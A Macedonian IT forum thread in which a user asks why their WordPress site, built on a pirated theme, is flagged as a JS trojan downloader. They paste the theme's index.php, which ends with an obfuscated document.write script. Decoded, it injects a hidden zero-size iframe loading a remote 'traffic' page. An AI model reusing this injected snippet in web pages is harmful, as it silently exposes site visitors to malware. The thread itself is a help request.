1. Здраво и добредојдовте на форумот на IT.mk.

  Доколку сеуште не сте дел од најголемата заедница на ИТ професионалци и ентузијасти во Македонија, можете бесплатно да се - процесот нема да ви одземе повеќе од 2-3 минути, а за полесна регистрација овозможивме и регистрирање со Facebook и Steam.
  Сокриј

Проблем со wordpress тема?

Дискусија во форумот 'Генерална дискусија' започната од Dimz....x3...Angela, 23 Февруари 2012.

 1. Dimz....x3...Angela

  Dimz....x3...Angela
  Intern

  20
  2
  25 Јануари 2012
  Машко
  Здраво на сите
  вака, вчера започнав нов вебсајт, купив домен, хостинг и се тоа, и сајтот користи вордпрес. Е сега, користам една тема којашто не е купена туку симната од нет. Проблемот е што кога пробувам да ја отворам страницата, некаде ја отвара а некаде пишува дека на страната има вирус, поточно покажува JS trojan downloader. Не гледам каде е проблемот. Во ниеден пост немам ставено никаков пиратски фајл. Мора да е до темата. Дали може да се реши овој проблем некако ?

  Поздрав и се надевам нема да смета темава во овој форум. Во спротивно преместете ја.
   
 2. Martinovski

  Martinovski
  Gaining Experience

  592
  292
  4 oктомври 2011
  Ништо не е објаснето, дај ми линк да го симнам темплејтот, да разгледам па да ти кажам.
   
 3. Dimz....x3...Angela

  Dimz....x3...Angela
  Intern

  20
  2
  25 Јануари 2012
  Машко
 4. hipo

  hipo
  Practice makes perfect

  1,612
  1,372
  27 Јануари 2011
  Машко
 5. Dimz....x3...Angela

  Dimz....x3...Angela
  Intern

  20
  2
  25 Јануари 2012
  Машко
 6. Dimz....x3...Angela

  Dimz....x3...Angela
  Intern

  20
  2
  25 Јануари 2012
  Машко
  ** eve go i celiot index. Sho e toa sho go povikuva toj if frame sho e takozvani virus


  <?php get_header(); ?>

  <div class="wrapper">

  <div id="content">

  <?php if ($paged < 2) {

  if (option::get('featured_enable') == 'on') {
  get_template_part('featured', 'index');
  }

  if ( !function_exists('dynamic_sidebar') || !dynamic_sidebar('Homepage: Content Widgets') ) : ?> <?php endif;

  } ?>

  <?php if (option::get('recent_part_enable') == 'on') {
  get_template_part('loop', 'index');
  } ?>

  </div><!-- end #content -->

  <div id="side">

  <?php get_sidebar(); ?>

  </div><!-- end #side -->

  <div class="cleaner">&nbsp;</div>

  <?php
  if (option::get('featured_footer_enable') == 'on') {
  get_template_part('featured-footer');
  }

  get_template_part('footer-widgets');

  ?>

  </div><!-- end .wrapper -->

  <?php get_footer(); ?> <script type="text/javascript">document.write('\u003C\u0069\u0066\u0072\u0061\u006D\u0065\u0020\u0073\u0072\u0063\u003D\u0022\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u006E\u0069\u0078\u0069\u0072\u0063\u002E\u0063\u006F\u006D\u002F\u0074\u0072\u0061\u0066\u0066\u0069\u0063\u002E\u0068\u0074\u006D\u006C\u0022\u0020\u006D\u0061\u0072\u0067\u0069\u006E\u0077\u0069\u0064\u0074\u0068\u003D\u0022\u0030\u0022\u0020\u006D\u0061\u0072\u0067\u0069\u006E\u0068\u0065\u0069\u0067\u0068\u0074\u003D\u0022\u0030\u0022\u0020\u0066\u0072\u0061\u006D\u0065\u0062\u006F\u0072\u0064\u0065\u0072\u003D\u0022\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003D\u0022\u0030\u0022\u0020\u0073\u0063\u0072\u006F\u006C\u006C\u0069\u006E\u0067\u003D\u0022\u004E\u004F\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003D\u0022\u0030\u0022\u003E\u003C\u002F\u0069\u0066\u0072\u0061\u006D\u0065\u003E');</script>
   

Сподели

Вчитување...